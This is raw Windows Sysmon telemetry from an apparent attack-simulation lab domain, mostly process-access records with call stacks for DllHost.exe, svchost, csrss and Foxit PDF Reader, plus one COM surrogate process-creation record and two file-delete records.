12:18:26.397{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.397{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.396{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.396{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.396{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.115{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.115{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.100{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.100{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.084{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.084{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.084{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.084{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.084{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.084{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+25579|c:\windows\system32\rpcss.dll+3fd82|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.096{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000040526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.803{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.803{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.803{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.803{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64) 10341000x800000000000000040522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.803{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64) 23542300x800000000000000040521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.694{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1642AA38DA3AD180EDA2699B876D8B12,SHA256=EABB62D8CE5739752299188FFBBD5022167D5ED43B2782809D9FEA8588E6B3AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015474Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:27.347{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA077AFEE102E02C86F6643A0EEAD8FE,SHA256=B724ACE009F440C92DAFD01F047F2C05433C4C57BE21AB2F00A522AE2CC94FA8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.538{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.538{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.538{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 